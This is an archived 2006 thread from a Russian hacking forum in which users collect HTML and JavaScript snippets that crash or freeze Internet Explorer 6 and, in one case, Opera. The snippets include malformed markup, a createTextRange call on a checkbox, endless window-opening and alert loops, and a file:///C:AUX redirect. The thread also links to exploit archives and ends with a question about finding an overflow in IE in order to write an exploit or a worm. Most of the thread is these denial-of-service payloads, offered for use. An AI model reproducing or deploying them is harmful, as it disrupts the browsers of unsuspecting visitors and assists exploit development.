Форум АНТИЧАТ - Как повесить IE

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Как повесить IE (https://forum.antichat.xyz/showthread.php?t=21792)

Dracula4ever

15.07.2006 19:01

Как повесить IE

Я увидел что в знаменитом браузере Internet explorer сюществует полно багов, поэтому я подумал что это может быть не плохо если я открою топик в котором каждый будет описывать разные баги которые существуют в браузере Internet explorer .

Правила публикации багов очень просты:

1. Расскажите немного про баг.
2. Кем был он найден.

Я начинаю.

Баг в IE 6

Этот баг позволяет сделать DoS (Denial of Service или Отказ от Обслуживания) атаку на IE 6 пока он не рухнет.
Как я слышал он был найден командой FIRST.
Код:

Код:

# <acronym><dd><h5><applet></caption></applet></h1>

Или просто напишите это:

Код:

<table datasrc=".">

Elekt

15.07.2006 19:53

http://browserfun.blogspot.com/

новейшие сплоиты каждый день

Dracula4ever

15.07.2006 20:34

Вот еще один DoS.
Был найден юзером jsz.
Этот баг загружает браузер пока он не рухает.

Код:

Код:

<meta http-equiv="refresh" content="0;url=mkmk.html">

<SCRIPT LANGUAGE="javascript">

<!--

window.open ('ms-ie.html')

-->

</SCRIPT>

+toxa+

15.07.2006 21:23

Дракула, браузерный убийца...+))))
http://www.milw0rm.com/search.php?dong=Internet+Explorer

Дикс	15.07.2006 22:14

Eco[L]og

16.07.2006 11:16

Вот сразу 3 бага для ослика. Кто нашел незнаю.

Первый:
Открывает множество окон

Код HTML:

<script>

now();

function now() {for (i=1;i>0;i++){open('index.htm','new'+i);}}

</script>

Второй:
Выводит сообщение ERROR и делает открытое окно недоступным

Код HTML:

<script>

{ while ( true ) window.alert('ERROR !'); } 

</script>

Третий:
трясет окно Обозревателя

Код HTML:

<body onloaD="MM_callJS('shake();')">

<script language="JavaScript1.2">

function shake() {

n=100;

for (i = 10; i > 0; i--) {

for (j = n; j > 0; j--) {

self.moveBy(0,i);

self.moveBy(i,0);

self.moveBy(0,-i);

self.moveBy(-i,0);

}

}

}

function MM_callJS(jsStr) { file://v2.0

return eval(jsStr)

}

</script>

Dracula4ever

16.07.2006 11:36

Eco[L]og так держать =)
Я продолжаю.

Этот баг был найден Stelian Ene и он работает в IE 6.
Ксожелению я про него ничего не могу рассказать.

Код:

<input type="checkbox" id='c'>

<script>

        r=document.getElementById("c");

        a=r.createTextRange();

</script>

bandera

16.07.2006 11:41

Цитата:

Сообщение от Eco[L]og

Вот сразу 3 бага для ослика. Кто нашел незнаю.

Первый:
Открывает множество окон

Код HTML:

<script>

now();

function now() {for (i=1;i>0;i++){open('index.htm','new'+i);}}

</script>

Второй:
Выводит сообщение ERROR и делает открытое окно недоступным

Код HTML:

<script>

{ while ( true ) window.alert('ERROR !'); } 

</script>

Третий:
трясет окно Обозревателя

Код HTML:

<body onloaD="MM_callJS('shake();')">

<script language="JavaScript1.2">

function shake() {

n=100;

for (i = 10; i > 0; i--) {

for (j = n; j > 0; j--) {

self.moveBy(0,i);

self.moveBy(i,0);

self.moveBy(0,-i);

self.moveBy(-i,0);

}

}

}

function MM_callJS(jsStr) { file://v2.0

return eval(jsStr)

}

</script>

Гы =))) Это баги? Да это просто скрипты

Ch3ck

17.07.2006 20:36

Бегущие полосы вешающите Ie

Код:

<HTML>

<BODY>

<SCRIPT>

var color = new Array;

color[1] = "black";

color[2] = "white";

for(x = 0; x <3; x++)

{

document.bgColor = color[x]

if(x == 2){

x = 0;

} 

}

</SCRIPT>

</BODY>

</HTML>

:cool: это только для IE
А вот эта штука оперу вешает.

Код:

<script>

parent.location="file:///C:AUX";

</script>

:cool:

Rubick

18.07.2006 07:35

Народ, а не кто не копал дальше последнюю статью в ][ про новую уязвимость в ишаке? Там насколько я помню дело встало за написанием плагина к Ольке, чтобы откапать в каком именно месте идет переполнение, без этого ни экплоита ни червячка не напишешь. Это насколько я понимаю настоящая уязвимость.

Время: 13:17